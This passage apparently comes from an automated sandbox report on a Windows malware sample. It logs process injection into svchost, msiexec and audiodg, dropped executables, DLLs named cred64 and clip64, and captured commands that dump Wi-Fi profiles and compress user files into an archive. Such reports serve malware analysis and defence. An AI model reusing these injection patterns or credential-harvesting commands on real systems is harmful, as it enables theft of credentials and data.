                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF7179D7000Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF7179D8000Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF7179D9000Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF7179DA000Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeMemory written: C:\Windows\System32\msiexec.exe base: A2507DC010Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF7E52B0000Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF7E52B1000Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF7E52B5000Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF7E52B7000Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF7E52B8000Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF7E52B9000Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF7E52BA000Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeMemory written: C:\Windows\System32\svchost.exe base: A56AEAD010Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF7A91B0000Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF7A91B1000Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF7A91B5000Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF7A91B7000Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF7A91B8000Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF7A91B9000Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF7A91BA000Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeMemory written: C:\Windows\System32\audiodg.exe base: F132077010Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF7E52B0000
                              Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF7E52B1000
                              Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF7E52B5000
                              Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF7E52B7000
                              Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF7E52B8000
                              Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF7E52B9000
                              Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF7E52BA000
                              Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exeMemory written: C:\Windows\System32\svchost.exe base: B1A8FE2010
                              Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF7179D0000
                              Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF7179D1000
                              Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF7179D5000
                              Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF7179D7000
                              Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF7179D8000
                              Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF7179D9000
                              Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF7179DA000
                              Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exeMemory written: C:\Windows\System32\msiexec.exe base: 703BC13010
                              Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF7A91B0000
                              Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF7A91B1000
                              Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF7A91B5000
                              Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF7A91B7000
                              Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF7A91B8000
                              Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF7A91B9000
                              Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF7A91BA000
                              Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exeMemory written: C:\Windows\System32\audiodg.exe base: F613A3F010
                              Source: C:\Users\user\AppData\Local\Temp\10000830101\update.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF7179D0000
                              Source: C:\Users\user\AppData\Local\Temp\10000830101\update.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF7179D1000
                              Source: C:\Users\user\AppData\Local\Temp\10000830101\update.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF7179D5000
                              Source: C:\Users\user\AppData\Local\Temp\10000830101\update.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF7179D7000
                              Source: C:\Users\user\AppData\Local\Temp\10000830101\update.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF7179D8000
                              Source: C:\Users\user\AppData\Local\Temp\10000830101\update.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF7179D9000
                              Source: C:\Users\user\AppData\Local\Temp\10000830101\update.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF7179DA000
                              Source: C:\Users\user\AppData\Local\Temp\10000830101\update.exeMemory written: C:\Windows\System32\msiexec.exe base: D3C403F010
                              Source: C:\Users\user\AppData\Local\Temp\10000830101\update.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF7E52B0000
                              Source: C:\Users\user\AppData\Local\Temp\10000830101\update.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF7E52B1000
                              Source: C:\Users\user\AppData\Local\Temp\10000830101\update.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF7E52B5000
                              Source: C:\Users\user\AppData\Local\Temp\10000830101\update.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF7E52B7000
                              Source: C:\Users\user\AppData\Local\Temp\10000830101\update.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF7E52B8000
                              Source: C:\Users\user\AppData\Local\Temp\10000830101\update.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF7E52B9000
                              Source: C:\Users\user\AppData\Local\Temp\10000830101\update.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF7E52BA000
                              Source: C:\Users\user\AppData\Local\Temp\10000830101\update.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF7A91B0000
                              Source: C:\Users\user\AppData\Local\Temp\10000830101\update.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF7A91B1000
                              Source: C:\Users\user\AppData\Local\Temp\10000830101\update.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF7A91B5000
                              Source: C:\Users\user\AppData\Local\Temp\10000830101\update.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF7A91B7000
                              Source: C:\Users\user\AppData\Local\Temp\10000830101\update.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF7A91B8000
                              Source: C:\Users\user\AppData\Local\Temp\10000830101\update.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF7A91B9000
                              Source: C:\Users\user\AppData\Local\Temp\10000830101\update.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF7A91BA000
                              Source: C:\Users\user\AppData\Local\Temp\10000830101\update.exeMemory written: C:\Windows\System32\audiodg.exe base: 71EFE74010
                              Source: C:\Users\user\AppData\Local\Temp\10000830101\update.exeMemory written: C:\Windows\System32\svchost.exe base: F16773010
                              Source: C:\Users\user\Desktop\yINR7uQlPr.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"Jump to behavior
                              Source: C:\Users\user\Desktop\yINR7uQlPr.exeProcess created: C:\Windows\System32\audiodg.exe "C:\Windows\system32\audiodg.exe"Jump to behavior
                              Source: C:\Users\user\Desktop\yINR7uQlPr.exeProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe"Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeProcess created: C:\Windows\System32\audiodg.exe "C:\Windows\system32\audiodg.exe"Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe"Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeProcess created: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe "C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeProcess created: C:\Windows\System32\audiodg.exe "C:\Windows\system32\audiodg.exe"Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe"Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exeProcess created: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe "C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe"
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, Main
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, Main
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\clip64.dll, Main
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\clip64.dll, Main
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeProcess created: C:\Users\user\AppData\Local\Temp\10000820101\update.exe "C:\Users\user\AppData\Local\Temp\10000820101\update.exe"
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeProcess created: C:\Users\user\AppData\Local\Temp\10000830101\update.exe "C:\Users\user\AppData\Local\Temp\10000830101\update.exe"
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeProcess created: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe "C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe"
                              Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                              Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
                              Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                              Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
                              Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"
                              Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exeProcess created: C:\Windows\System32\audiodg.exe "C:\Windows\system32\audiodg.exe"
                              Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exeProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe"
                              Source: C:\Users\user\AppData\Local\Temp\10000830101\update.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"
                              Source: C:\Users\user\AppData\Local\Temp\10000830101\update.exeProcess created: C:\Windows\System32\audiodg.exe "C:\Windows\system32\audiodg.exe"
                              Source: C:\Users\user\AppData\Local\Temp\10000830101\update.exeProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe"
                              Source: explorer.exe, 00000004.00000003.3095270495.0000000009BA9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3520793875.0000000009BA9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2052790919.0000000009BA9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd=
                              Source: explorer.exe, 00000004.00000002.3380272580.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.2048096649.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
                              Source: explorer.exe, 00000004.00000000.2050130274.0000000004B00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3399053064.0000000004B00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3380272580.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                              Source: explorer.exe, 00000004.00000002.3380272580.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.2048096649.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                              Source: explorer.exe, 00000004.00000002.3380272580.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.2048096649.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                              Source: explorer.exe, 00000004.00000002.3376670796.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2047725228.0000000000EF0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PProgman
                              Source: C:\Windows\explorer.exeCode function: 4_2_033406EC cpuid 4_2_033406EC
                              Source: C:\Windows\explorer.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,4_2_033472AC
                              Source: C:\Windows\explorer.exeCode function: __getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,4_2_0334813C
                              Source: C:\Windows\explorer.exeCode function: _calloc_crt,_malloc_crt,free,_malloc_crt,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_num,free,free,free,4_2_033479B4
                              Source: C:\Windows\explorer.exeCode function: __getlocaleinfo,_malloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,__crtLCMapStringA,__crtLCMapStringA,__crtGetStringTypeA,free,free,free,free,free,free,free,free,free,4_2_0333E9CC
                              Source: C:\Windows\explorer.exeCode function: __crtGetLocaleInfoA,__crtGetLocaleInfoA,_calloc_crt,__crtGetLocaleInfoA,_calloc_crt,free,free,_calloc_crt,free,4_2_0333FF98
                              Source: C:\Windows\explorer.exeCode function: _calloc_crt,_malloc_crt,free,_malloc_crt,free,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_mon,free,free,free,free,4_2_03347428
                              Source: C:\Windows\explorer.exeCode function: _getptd,__lc_wcstolc,__get_qualified_locale,__lc_lctowcs,GetLocaleInfoEx,GetACP,4_2_098429BC
                              Source: C:\Windows\explorer.exeCode function: _getptd,TranslateName,GetLocaleNameFromLangCountry,GetLocaleNameFromLanguage,TranslateName,GetLocaleNameFromLangCountry,ProcessCodePage,IsValidCodePage,GetLocaleInfoEx,GetLocaleInfoEx,GetLocaleInfoEx,_itow_s,GetLocaleNameFromLanguage,4_2_0984A0F8
                              Source: C:\Windows\explorer.exeCode function: _calloc_crt,_malloc_crt,free,_malloc_crt,free,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_mon,free,free,free,free,4_2_09848028
                              Source: C:\Windows\explorer.exeCode function: __crtGetLocaleInfoA,GetLastError,__crtGetLocaleInfoA,_calloc_crt,__crtGetLocaleInfoA,_calloc_crt,free,free,GetLocaleInfoEx,_calloc_crt,GetLocaleInfoEx,free,4_2_09840B98
                              Source: C:\Windows\explorer.exeCode function: GetLocaleInfoEx,4_2_09850378
                              Source: C:\Windows\explorer.exeCode function: _getptd,GetLocaleInfoEx,GetLocaleInfoEx,TestDefaultCountry,GetLocaleInfoEx,TestDefaultCountry,_getptd,GetLocaleInfoEx,4_2_09849AD4
                              Source: C:\Windows\explorer.exeCode function: _calloc_crt,_malloc_crt,free,_malloc_crt,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_num,free,free,free,4_2_098485B4
                              Source: C:\Windows\explorer.exeCode function: __getlocaleinfo,_malloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,GetCPInfo,__crtLCMapStringA,__crtLCMapStringA,__crtGetStringTypeA,free,free,free,free,free,free,free,free,free,4_2_0983F5CC
                              Source: C:\Windows\explorer.exeCode function: __getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,4_2_09848D3C
                              Source: C:\Windows\explorer.exeCode function: GetLocaleInfoEx,malloc,GetLocaleInfoEx,WideCharToMultiByte,free,4_2_09847D50
                              Source: C:\Windows\explorer.exeCode function: GetLocaleInfoEx,4_2_09849FF4
                              Source: C:\Windows\explorer.exeCode function: GetLocaleInfoEx,GetLocaleInfoEx,GetACP,4_2_09849F40
                              Source: C:\Windows\explorer.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,4_2_09847EAC
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,16_2_00007FF8B836FA48
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: GetProcAddress,GetLocaleInfoW,16_2_00007FF8B831DC20
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: EnterCriticalSection,EnumSystemLocalesW,LeaveCriticalSection,16_2_00007FF8B836D2E0
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: EnumSystemLocalesW,16_2_00007FF8B836F35C
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: GetPrimaryLen,EnumSystemLocalesW,16_2_00007FF8B836F3C4
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: GetPrimaryLen,EnumSystemLocalesW,16_2_00007FF8B836F478
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,16_2_00007FF8B836F8C0
                              Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,18_2_006D2516
                              Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exeCode function: EnumSystemLocalesW,18_2_006D27B8
                              Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exeCode function: EnumSystemLocalesW,18_2_006D2803
                              Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exeCode function: EnumSystemLocalesW,18_2_006C88AC
                              Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exeCode function: EnumSystemLocalesW,18_2_006D289E
                              Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,18_2_006D2929
                              Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exeCode function: GetLocaleInfoW,18_2_006D2B7C
                              Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,18_2_006D2CA2
                              Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exeCode function: GetLocaleInfoW,18_2_006C8DCE
                              Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exeCode function: GetLocaleInfoW,18_2_006D2DA8
                              Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,18_2_006D2E77
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,19_2_007E2516
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: EnumSystemLocalesW,19_2_007E27B8
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: EnumSystemLocalesW,19_2_007E2803
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: EnumSystemLocalesW,19_2_007D88AC
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: EnumSystemLocalesW,19_2_007E289E
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,19_2_007E2929
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: GetLocaleInfoW,19_2_007E2B7C
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,19_2_007E2CA2
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: GetLocaleInfoW,19_2_007D8DCE
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: GetLocaleInfoW,19_2_007E2DA8
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,19_2_007E2E77
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,20_2_007E2516
